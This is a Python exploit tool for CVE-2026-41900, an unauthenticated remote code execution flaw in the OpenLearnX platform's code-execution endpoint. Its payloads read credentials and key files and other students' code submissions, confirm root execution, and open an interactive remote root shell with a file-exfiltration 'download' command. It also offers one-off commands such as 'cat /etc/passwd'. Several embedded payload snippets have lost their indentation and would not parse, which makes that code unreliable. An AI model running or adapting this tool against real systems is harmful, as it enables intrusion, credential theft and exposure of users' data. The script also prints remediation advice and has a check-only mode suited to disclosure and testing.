README.md
Rendering markdown...
#!/usr/bin/env python3
import argparse
import json
import os
import readline
import sys
import textwrap
import urllib.error
import urllib.request
from datetime import datetime, timezone
# ANSI SGR escape sequences used to colour terminal output throughout this
# script. They are interpolated directly into f-strings; RESET restores the
# terminal's default attributes after a coloured span.
RESET = "\033[0m"
BOLD = "\033[1m"
RED = "\033[91m"     # bright red
GREEN = "\033[92m"   # bright green
YELLOW = "\033[93m"  # bright yellow
BLUE = "\033[94m"    # bright blue
CYAN = "\033[96m"    # bright cyan
DIM = "\033[2m"      # faint / decreased intensity
MAG = "\033[95m"     # bright magenta
WHITE = "\033[97m"   # bright white
# Start-up banner; main() prints it unless -q/--quiet is given.
# NOTE(review): the box interior does not line up with the top/bottom border
# in this copy (runs of spaces look collapsed) — confirm against the upstream
# file before relying on the rendered layout.
BANNER = f"""
{BLUE}╔═══════════════════════════════════════════════════════════════════╗{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE} ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗███████╗{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██╔═══██╗██║ ╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ╚███╔╝ ██████╔╝██║ █████╗ {RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}██║ ██║██║ ██╔██╗ ██╔══██╗██║ ██╔══╝ {RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE}╚██████╔╝███████╗██╔╝ ██╗ ██║ ██║╚██████╗███████╗{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BOLD}{WHITE} ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {CYAN}OpenLearnX Unauthenticated RCE via Container Volume Mount{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {DIM}Tempfile dir traversal → Secret leak → Root container exec{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {YELLOW}CVE-2026-41900{RESET} • {YELLOW}GHSA-8h25-q488-4hxw{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {BLUE}║{RESET}
{BLUE}║{RESET} {MAG}by Christbowel{RESET} {BLUE}║{RESET}
{BLUE}╚═══════════════════════════════════════════════════════════════════╝{RESET}
"""
# Candidate code-execution paths. find_endpoint() appends each one to the
# target base URL, in this order, and returns the first that echoes its probe.
ENDPOINTS = [
"/api/compiler/execute",
"/api/coding/execute",
"/execute",
]
# Substrings (all lower-case) that is_hit() looks for in lower-cased output;
# any match means the output is treated as a failure rather than a hit.
FAIL_PATTERNS = [
"operation not permitted", "permission denied", "no such file",
"not found", "cannot open", "traceback", "blocked",
"security violation", "modulenotfounderror",
]
# Registry of named probes, keyed by the name accepted by --gadget.
# Each entry is a dict with:
#   severity / cwe / desc - labels printed by run_gadget() and copied into the
#                           evidence list by run_all_gadgets()
#   code                  - Python source submitted to the execution endpoint
#   check                 - predicate over the returned stdout; True means the
#                           finding is considered confirmed
#
# NOTE(review): several "code" snippets below contain block statements
# (`for`, `if`, `else`) whose bodies carry no indentation in this copy. As
# written they would not parse as Python, which suggests whitespace inside the
# literals was lost. The intended nesting is not fully recoverable from here
# (e.g. whether the second `if not found:` in "secrets" is nested), so the
# literals are left untouched — restore them from the upstream copy.
GADGETS = {
# Lists the entries of /app and prints a "LISTING:<count>" header line.
"listing": {
"severity": "HIGH",
"cwe": "CWE-538",
"desc": "Directory listing of mounted /tmp via /app",
"code": textwrap.dedent("""\
import os
base = '/app'
entries = os.listdir(base)
print(f"LISTING:{len(entries)}")
for e in sorted(entries):
full = os.path.join(base, e)
size = os.path.getsize(full) if os.path.isfile(full) else -1
tag = "DIR" if os.path.isdir(full) else f"{size}B"
print(f" {tag:>10s} {e}")
"""),
# Confirmed only when the reported count is greater than 1. int() raises
# ValueError if the text after "LISTING:" on that line is not numeric.
"check": lambda o: "LISTING:" in o and int(o.split("LISTING:")[1].split("\n")[0]) > 1,
},
# Globs /app for a fixed set of config/key-like suffixes and prints a
# "FILE:<name>:<size>" header plus a content prefix for each small file.
"secrets": {
"severity": "CRITICAL",
"cwe": "CWE-538 / CWE-377",
"desc": "Read credentials and secrets from /tmp",
"code": textwrap.dedent("""\
import os, glob
found = False
for pat in ['/app/*.conf', '/app/*.pem', '/app/*.key', '/app/*.env',
'/app/*.json', '/app/*.yml', '/app/*.yaml', '/app/*.cfg',
'/app/*.ini', '/app/*.secret', '/app/*.sock']:
for f in glob.glob(pat):
if os.path.isfile(f) and os.path.getsize(f) < 50000:
found = True
print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
print(open(f).read()[:800])
print("---")
if not found:
for f in sorted(glob.glob('/app/*'))[:15]:
if os.path.isfile(f) and not f.endswith('.py') and os.path.getsize(f) < 50000:
found = True
print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
print(open(f).read()[:500])
print("---")
if not found:
print("NO_FILES")
"""),
# Confirmed when at least one "FILE:" header was printed.
"check": lambda o: "FILE:" in o,
},
# Enumerates /app/*.py other than the running script and prints a
# "SUBMISSIONS:<count>" header followed by a prefix of each file.
"submissions": {
"severity": "HIGH",
"cwe": "CWE-538",
"desc": "Read other students' code submissions from /tmp",
"code": textwrap.dedent("""\
import os, glob
own = os.path.abspath(__file__) if '__file__' in dir() else ''
pyfiles = [f for f in glob.glob('/app/*.py')
if os.path.isfile(f) and os.path.abspath(f) != own]
if pyfiles:
print(f"SUBMISSIONS:{len(pyfiles)}")
for f in sorted(pyfiles)[:10]:
print(f"\\n--- {os.path.basename(f)} ({os.path.getsize(f)}B) ---")
print(open(f).read()[:600])
else:
print("NO_SUBMISSIONS")
"""),
# "NO_SUBMISSIONS" does not contain the "SUBMISSIONS:" marker (no colon),
# so the negative case is not mistaken for a hit.
"check": lambda o: "SUBMISSIONS:" in o,
},
# Prints the effective UID/GID of the executing process.
"rootcheck": {
"severity": "MEDIUM",
"cwe": "CWE-250",
"desc": "Confirm root execution (no user= in containers.run)",
"code": "import os; uid=os.getuid(); gid=os.getgid(); print(f'UID:{uid} GID:{gid}')",
# Substring match on "UID:0".
"check": lambda o: "UID:0" in o,
},
# Reads the Cap* lines from /proc/1/status and reports CapEff as hex.
"caps": {
"severity": "MEDIUM",
"cwe": "CWE-250",
"desc": "Default Docker capabilities (no cap_drop)",
"code": textwrap.dedent("""\
caps = {}
for line in open('/proc/1/status'):
if line.startswith('Cap'):
k, v = line.strip().split(':\\t')
caps[k] = v
eff = int(caps.get('CapEff', '0'), 16)
print(f"CAPEFF:0x{eff:016x}")
print("DEFAULT_CAPS" if eff > 0 else "CAPS_DROPPED")
"""),
# The snippet prints DEFAULT_CAPS for any non-zero CapEff value.
"check": lambda o: "DEFAULT_CAPS" in o,
},
}
def log_ok(msg):
    """Print *msg* as a success line, prefixed with a green ``[+]`` marker."""
    marker = f"{GREEN}[+]{RESET}"
    print(f" {marker} {msg}")
def log_fail(msg):
    """Print *msg* as a failure line, prefixed with a red ``[-]`` marker."""
    marker = f"{RED}[-]{RESET}"
    print(f" {marker} {msg}")
def log_info(msg):
    """Print *msg* as an informational line, prefixed with a blue ``[*]`` marker."""
    marker = f"{BLUE}[*]{RESET}"
    print(f" {marker} {msg}")
def log_warn(msg):
    """Print *msg* as a warning line, prefixed with a yellow ``[!]`` marker."""
    marker = f"{YELLOW}[!]{RESET}"
    print(f" {marker} {msg}")
def log_hit(sev, msg):
    """Print *msg* tagged with the severity label *sev* in brackets.

    The label colour is red for CRITICAL, yellow for HIGH, cyan for MEDIUM
    and dim for INFO; any other label is printed in white.
    """
    palette = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN, "INFO": DIM}
    try:
        tint = palette[sev]
    except KeyError:
        tint = WHITE
    label = f"{tint}[{sev}]{RESET}"
    print(f" {label} {msg}")
def http_post(url, payload, timeout=20):
    """Send *payload* as a JSON POST to *url* and return ``(status, body)``.

    ``body`` is always a dict, so callers can use ``.get`` on it safely.
    Failures are reported in-band instead of being raised:

    * HTTP error status: ``(code, parsed_body)``, or
      ``(code, {"error": ...})`` when the error body is not a JSON object.
    * Transport failure, malformed URL, or a success response whose body is
      not a JSON object: ``(0, {"error": ...})``.

    ``json.dumps`` deliberately stays outside the ``try``: an unserialisable
    payload is a caller bug and should surface as an exception.
    """
    def _json_object(raw):
        # Callers treat the body as a mapping; reject valid-but-wrong JSON
        # (list, string, number) here rather than crashing later on ``.get``.
        parsed = json.loads(raw)
        if not isinstance(parsed, dict):
            raise ValueError(
                f"expected a JSON object, got {type(parsed).__name__}"
            )
        return parsed

    body = json.dumps(payload).encode()
    try:
        # Request() itself raises ValueError for a URL without a scheme, so
        # it is built inside the try to be reported like any other failure.
        req = urllib.request.Request(
            url,
            data=body,
            headers={"Content-Type": "application/json"},
            method="POST",
        )
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, _json_object(resp.read())
    except urllib.error.HTTPError as e:
        # Error responses often still carry a JSON body; prefer it if usable.
        try:
            return e.code, _json_object(e.read())
        except Exception:
            return e.code, {"error": str(e)}
    except urllib.error.URLError as e:
        return 0, {"error": f"{e.reason}"}
    except Exception as e:
        return 0, {"error": str(e)}
def http_get(url, timeout=10):
    """GET *url* and return ``(status, body)`` with *body* parsed from JSON.

    Best-effort helper: any failure (malformed URL, transport error, HTTP
    error status, body that is not a JSON object) yields ``(0, {})`` instead
    of raising, so ``body`` is always a dict.
    """
    try:
        # Built inside the try because Request() raises ValueError for a URL
        # that has no scheme.
        req = urllib.request.Request(url, method="GET")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
            parsed = json.loads(resp.read())
    except Exception:
        return 0, {}
    if not isinstance(parsed, dict):
        # Valid JSON but not an object; callers use ``.get`` on the result.
        return 0, {}
    return status, parsed
def execute(endpoint, code, lang="python"):
    """Submit *code* to *endpoint* and return ``(output, error, blocked)``.

    The request body is ``{"language": lang, "code": code}``. ``output`` and
    ``error`` are the stripped ``"output"`` / ``"error"`` fields of the
    response (empty string when missing or falsy); ``blocked`` is the
    response's ``"blocked"`` field, defaulting to ``False``. The HTTP status
    is not inspected.
    """
    _, reply = http_post(endpoint, {"language": lang, "code": code})
    stdout = reply.get("output") or ""
    stderr = reply.get("error") or ""
    return stdout.strip(), stderr.strip(), reply.get("blocked", False)
def is_hit(output, blocked=False):
    """Return True when *output* looks like a successful result.

    A blocked request or empty output is never a hit. Otherwise the output
    is lower-cased and rejected if it contains any FAIL_PATTERNS substring.
    """
    if blocked:
        return False
    if not output:
        return False
    lowered = output.lower()
    for pattern in FAIL_PATTERNS:
        if pattern in lowered:
            return False
    return True
def find_endpoint(target):
    """Return the first execution URL under *target* that runs a probe.

    Each ENDPOINTS path is appended to *target* and sent a snippet printing a
    marker string. The first URL whose output contains the marker is
    returned. A URL that reports the request as blocked is logged as a
    warning and skipped. Returns None when no candidate responds.
    """
    for path in ENDPOINTS:
        candidate = target + path
        log_info(f"Probing {DIM}{candidate}{RESET}")
        stdout, _stderr, was_blocked = execute(candidate, 'print("OLX_PROBE_OK")')
        if "OLX_PROBE_OK" not in stdout:
            if was_blocked:
                log_warn(f"Blocked (patched?) at {candidate}")
            continue
        log_ok(f"Live endpoint: {GREEN}{candidate}{RESET}")
        return candidate
    return None
def run_check(target):
    """Assess *target* and return ``(endpoint, vulnerable)``.

    Steps:
      1. GET ``/api/compiler/health`` (informational only).
      2. Locate a live execution endpoint via find_endpoint().
      3. Run two probes through it: one printing the UID, one counting the
         entries of ``/app``.

    Returns ``(None, False)`` when no endpoint responds. Otherwise returns
    the endpoint URL and True if the code ran as UID 0, or ``/app`` was
    listable, or both; False if neither.
    """
    print(f"\n{BOLD}[CHECK]{RESET} Verifying {target}\n")
    health_url = target + "/api/compiler/health"
    log_info(f"GET {health_url}")
    status, resp = http_get(health_url)
    if status == 200:
        # http_get returns whatever JSON the server sent; guard against a
        # non-object body before using ``.get``.
        docker = resp.get("docker_available") if isinstance(resp, dict) else None
        log_ok(f"Health OK — Docker: {docker}")
    else:
        log_info("Health endpoint not found (expected for pre-patch)")

    ep = find_endpoint(target)
    if not ep:
        log_fail("No live execution endpoint found")
        return None, False

    out, _, _ = execute(ep, "import os; print(f'UID:{os.getuid()}')")
    root = "UID:0" in out

    # The probe is sent as source text, so its own block indentation must be
    # intact or it fails to parse on the far side and the mount is never
    # detected. dedent() strips the margin added here for readability.
    mount_probe = textwrap.dedent("""\
        import os
        try:
            n = len(os.listdir('/app'))
            print(f"MOUNT:{n}")
        except OSError:
            print("NO_MOUNT")
        """)
    out2, _, _ = execute(ep, mount_probe)
    # "NO_MOUNT" has no colon, so it does not match the "MOUNT:" marker.
    mount = "MOUNT:" in out2

    print()
    if root and mount:
        log_ok(f"{GREEN}VULNERABLE{RESET} — root exec + /tmp volume mount exposed")
        return ep, True
    if mount:
        log_warn(f"{YELLOW}PARTIAL{RESET} — /tmp mounted but not root")
        return ep, True
    if root:
        log_warn(f"{YELLOW}PARTIAL{RESET} — root exec but /tmp not mounted")
        return ep, True
    log_fail(f"{RED}NOT VULNERABLE{RESET} — patched or different config")
    return ep, False
def run_gadget(ep, name):
    """Run the GADGETS entry *name* against *ep*; return True if confirmed.

    Prints the gadget's severity/description header, submits its code, and
    then either reports that the request was blocked, echoes up to 30 lines
    of output when the gadget's check accepts it, or prints a short
    "not confirmed" detail. Raises KeyError for an unknown *name*.
    """
    spec = GADGETS[name]
    log_hit(spec["severity"], f"{spec['desc']} {DIM}({spec['cwe']}){RESET}")
    stdout, stderr, was_blocked = execute(ep, spec["code"])

    if was_blocked:
        print(f" {RED}BLOCKED{RESET} — security filter")
        return False

    if not spec["check"](stdout):
        # Show whichever stream has content, truncated to keep one line.
        detail = stdout[:120] or stderr[:120] or "(empty)"
        print(f" {DIM}not confirmed: {detail}{RESET}")
        return False

    shown = stdout.splitlines()[:30]
    for row in shown:
        print(f" {DIM}│{RESET} {row}")
    return True
def run_all_gadgets(ep):
    """Run every GADGETS entry against *ep*.

    Returns ``(results, evidence)``: ``results`` maps gadget name to the
    boolean outcome of run_gadget(); ``evidence`` lists one
    ``{"gadget", "severity", "cwe"}`` dict per confirmed gadget, in
    registry order. A blank line is printed after each gadget.
    """
    print(f"\n{BOLD}[EXPLOIT]{RESET} Running all gadgets against {CYAN}{ep}{RESET}\n")
    outcome, confirmed = {}, []
    for gadget_name, spec in GADGETS.items():
        outcome[gadget_name] = run_gadget(ep, gadget_name)
        if outcome[gadget_name]:
            confirmed.append(
                dict(gadget=gadget_name, severity=spec["severity"], cwe=spec["cwe"])
            )
        print()
    return outcome, confirmed
def run_command(ep, cmd):
    """Run shell command *cmd* through *ep* and return its text output.

    *cmd* is embedded via ``repr`` into a small ``subprocess.run`` snippet
    that prints the command's stdout followed by its stderr. Returns a
    coloured "blocked" notice when the endpoint reports the request as
    blocked; otherwise the snippet's output, falling back to the endpoint's
    error text, falling back to the empty string.
    """
    # dedent() removes the margin added here for readability.
    snippet = textwrap.dedent(f"""\
        import subprocess
        r = subprocess.run({cmd!r}, shell=True, capture_output=True, text=True, timeout=15)
        if r.stdout: print(r.stdout, end='')
        if r.stderr: print(r.stderr, end='')
        """)
    stdout, stderr, was_blocked = execute(ep, snippet)
    if was_blocked:
        return f"{RED}[blocked by security filter]{RESET}"
    if stdout:
        return stdout
    return stderr if stderr else ""
def interactive_shell(ep):
    """Read commands from the terminal and run each one through *ep*.

    Prints a header box, asks the endpoint for its node name to build the
    prompt, and loads readline history from ``~/.olx_shell_history`` if it
    exists. Blank lines are ignored; ``exit``/``quit``, EOF or Ctrl+C at the
    prompt end the session; ``download <path>`` is routed to download_file();
    anything else goes to run_command(). History is written back on exit,
    ignoring any error while doing so.
    """
    box_rows = (
        "┌──────────────────────────────────────────────┐",
        "│ OLX Remote Shell — CVE-2026-41900 │",
        "│ Type 'exit' or Ctrl+C to quit │",
        "│ Each command spawns a new container │",
        "└──────────────────────────────────────────────┘",
    )
    framed = "\n".join(f"{BOLD}{CYAN}{row}{RESET}" for row in box_rows)
    # One blank line above and below the box.
    print("\n" + framed + "\n")

    node, _, _ = execute(ep, "import os; print(os.uname().nodename)")
    hostname = node.strip() or "container"
    # hostname is fixed for the session, so the prompt is built once.
    prompt = f"{RED}root@{hostname}{RESET}:{BLUE}/app{RESET}# "

    histfile = os.path.expanduser("~/.olx_shell_history")
    try:
        readline.read_history_file(histfile)
    except FileNotFoundError:
        pass

    while True:
        try:
            entered = input(prompt)
        except (EOFError, KeyboardInterrupt):
            print(f"\n{DIM}[shell closed]{RESET}")
            break

        entered = entered.strip()
        if not entered:
            continue
        if entered.lower() in ("exit", "quit"):
            print(f"{DIM}[shell closed]{RESET}")
            break
        if entered.startswith("download "):
            # Everything after the first space is the remote path.
            download_file(ep, entered.partition(" ")[2].strip())
            continue

        reply = run_command(ep, entered)
        if reply:
            print(reply)

    try:
        readline.write_history_file(histfile)
    except Exception:
        pass
def download_file(ep, remote_path):
    """Fetch *remote_path* through *ep* and save it in the current directory.

    Paths not already under ``/app/`` are re-rooted there. The file is
    transferred as a ``SIZE:<n>`` line followed by one base64 line and is
    written locally under its base name, overwriting any existing file of
    that name. Nothing is written unless the decoded payload matches the
    reported size. All failures are logged via log_fail(); nothing is raised
    for a bad response.
    """
    import base64

    if not remote_path.startswith("/app/"):
        remote_path = "/app/" + remote_path.lstrip("/")

    local = os.path.basename(remote_path)
    if not local:
        # e.g. "download subdir/": no file name to save under.
        log_fail(f"Not a file path: {remote_path}")
        return

    # The snippet is sent as source text, so its block indentation must be
    # intact; dedent() only strips the margin added here for readability.
    code = textwrap.dedent(f"""\
        import base64, os
        path = {remote_path!r}
        if os.path.isfile(path):
            data = open(path, 'rb').read()
            print(f"SIZE:{{len(data)}}")
            print(base64.b64encode(data).decode())
        else:
            print("NOT_FOUND")
        """)
    out, err, blk = execute(ep, code)

    if blk:
        log_fail(f"Blocked by security filter: {remote_path}")
        return
    if "NOT_FOUND" in out:
        log_fail(f"File not found: {remote_path}")
        return

    lines = out.strip().splitlines()
    if not lines or not lines[0].startswith("SIZE:"):
        log_fail(f"Unexpected response: {(out or err)[:100]}")
        return

    # An empty file yields only the SIZE line once the output is stripped.
    encoded = lines[1] if len(lines) > 1 else ""
    try:
        size = int(lines[0].split(":", 1)[1])
        # binascii.Error is a ValueError subclass, so one handler covers
        # both a bad size field and malformed base64.
        data = base64.b64decode(encoded, validate=True)
    except ValueError:
        log_fail(f"Unexpected response: {out[:100]}")
        return

    if len(data) != size:
        # Most likely the response was truncated in transit.
        log_fail(f"Size mismatch for {remote_path}: expected {size}B, got {len(data)}B")
        return

    with open(local, "wb") as f:
        f.write(data)
    log_ok(f"Downloaded {local} ({size}B)")
def save_evidence(target, ep, evidence):
    """Write a JSON evidence report to the current directory.

    The report records the CVE/GHSA identifiers, *target*, *ep*, a UTC
    ISO-8601 timestamp and the *evidence* list under ``"findings"``.
    Returns the (relative) path of the file written.
    """
    out_path = "cve-2026-41900-evidence.json"
    stamp = datetime.now(timezone.utc).isoformat()
    document = dict(
        cve="CVE-2026-41900",
        ghsa="GHSA-8h25-q488-4hxw",
        target=target,
        endpoint=ep,
        auth_required=False,
        timestamp=stamp,
        findings=evidence,
    )
    with open(out_path, "w") as handle:
        handle.write(json.dumps(document, indent=2))
    return out_path
def print_report(target, ep, results, evidence):
    """Print the run summary and, if anything was confirmed, save evidence.

    *results* maps gadget name to a boolean; *evidence* is the list built by
    run_all_gadgets(). Confirmed gadgets are grouped by severity and listed
    CRITICAL first. Static remediation advice is always printed. When
    *evidence* is non-empty it is written out via save_evidence() and the
    resulting path is shown.
    """
    confirmed = sum(bool(flag) for flag in results.values())

    by_severity = {}
    for finding in evidence:
        by_severity.setdefault(finding["severity"], []).append(finding["gadget"])

    rule = f"{BLUE}{'═' * 65}{RESET}"
    now = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')

    print(f"\n{rule}")
    print(f" {BOLD}CVE-2026-41900 — RESULTS{RESET}")
    print(rule)
    print(f" Target : {WHITE}{target}{RESET}")
    print(f" Endpoint : {CYAN}{ep}{RESET}")
    print(f" Auth : {RED}NONE REQUIRED{RESET}")
    print(f" Date : {now}")
    print()

    if confirmed == 0:
        log_fail("No vectors confirmed — instance appears patched")
    else:
        tints = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN}
        for level, tint in tints.items():
            if level not in by_severity:
                continue
            names = ', '.join(by_severity[level])
            print(f" {tint}[{level:>8s}]{RESET} {names}")
        print(f"\n {BOLD}Total : {confirmed} confirmed{RESET}")

    print()
    print(f" {GREEN}REMEDIATION:{RESET}")
    for advice in (
        "→ Update to commit 14765d7 or later",
        "→ Apply: cap_drop=['ALL'], user='65534:65534'",
        "→ Use per-execution tmpdir, not shared /tmp",
    ):
        print(f" {DIM}{advice}{RESET}")
    print(rule)

    if evidence:
        saved_to = save_evidence(target, ep, evidence)
        print(f"\n {GREEN}Evidence → {saved_to}{RESET}")
def build_parser():
    """Build and return the command-line parser.

    Defines one positional argument (the target base URL), a ``modes`` group
    (``--check``, ``--exploit``, ``--shell``, ``-c/--command``, repeatable
    ``--gadget`` restricted to GADGETS names) and ``-q/--quiet``. The epilog
    lists usage examples, the available gadgets and the shell built-ins.
    """
    # dedent() removes the margin added here for readability; "%(prog)s" is
    # expanded by argparse when the help text is rendered.
    usage_notes = textwrap.dedent(f"""\
        {BOLD}examples:{RESET}
        %(prog)s --check http://target:5000
        %(prog)s --exploit http://target:5000
        %(prog)s --shell http://target:5000
        %(prog)s -c "id" http://target:5000
        %(prog)s -c "cat /etc/passwd" http://target:5000
        %(prog)s --gadget secrets http://target:5000
        %(prog)s --gadget listing --gadget caps http://target:5000
        {BOLD}gadgets:{RESET}
        listing /tmp directory listing via volume mount [HIGH]
        secrets Read credentials and keys from /tmp [CRITICAL]
        submissions Read other users' code submissions [HIGH]
        rootcheck Confirm UID 0 execution [MEDIUM]
        caps Dump effective Linux capabilities [MEDIUM]
        {BOLD}shell commands:{RESET}
        download <path> Exfiltrate a file from /app to local dir
        exit Close the shell
        """)
    parser = argparse.ArgumentParser(
        prog="olx-rce",
        description="CVE-2026-41900 — OpenLearnX Unauthenticated RCE via Container Volume Mount",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_notes,
    )

    modes = parser.add_argument_group("modes")
    boolean_modes = (
        ("--check", "Check if target is vulnerable (no exploitation)"),
        ("--exploit", "Run all gadgets and generate evidence report"),
        ("--shell", "Drop into an interactive remote shell"),
    )
    for flag, blurb in boolean_modes:
        modes.add_argument(flag, action="store_true", help=blurb)
    modes.add_argument(
        "-c", "--command",
        metavar="CMD",
        help="Execute a single command and exit",
    )
    modes.add_argument(
        "--gadget",
        action="append",
        metavar="NAME",
        choices=list(GADGETS),
        help="Run a specific gadget (repeatable)",
    )

    parser.add_argument(
        "target",
        metavar="TARGET",
        help="Base URL of the OpenLearnX instance (e.g. http://host:5000)",
    )
    parser.add_argument(
        "-q", "--quiet",
        action="store_true",
        help="Suppress banner",
    )
    return parser
def main():
    """Parse the command line and dispatch to the selected mode.

    With no mode flag the help text is printed and the process exits 0.
    Otherwise exactly one mode runs, chosen in this order: ``--check``,
    ``-c/--command``, ``--gadget``, ``--exploit``, ``--shell``. Every mode
    except ``--check`` first needs a live endpoint from find_endpoint() and
    exits 1 if none is found. ``--check`` and ``--exploit`` exit 1 when
    nothing was confirmed; the other modes exit 0.
    """
    parser = build_parser()
    opts = parser.parse_args()
    if not opts.quiet:
        print(BANNER)
    base_url = opts.target.rstrip("/")

    requested = (opts.check, opts.exploit, opts.shell, opts.command, opts.gadget)
    if not any(requested):
        parser.print_help()
        sys.exit(0)

    if opts.check:
        _, vulnerable = run_check(base_url)
        sys.exit(0 if vulnerable else 1)

    endpoint = find_endpoint(base_url)
    if not endpoint:
        log_fail("No live execution endpoint found")
        log_info("Run with --check for detailed diagnostics")
        sys.exit(1)

    if opts.command:
        print(run_command(endpoint, opts.command))
        sys.exit(0)

    if opts.gadget:
        print(f"\n{BOLD}[GADGETS]{RESET} {', '.join(opts.gadget)}\n")
        for gadget_name in opts.gadget:
            run_gadget(endpoint, gadget_name)
            print()
        sys.exit(0)

    if opts.exploit:
        outcome, findings = run_all_gadgets(endpoint)
        print_report(base_url, endpoint, outcome, findings)
        sys.exit(0 if any(outcome.values()) else 1)

    if opts.shell:
        interactive_shell(endpoint)
        sys.exit(0)


# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()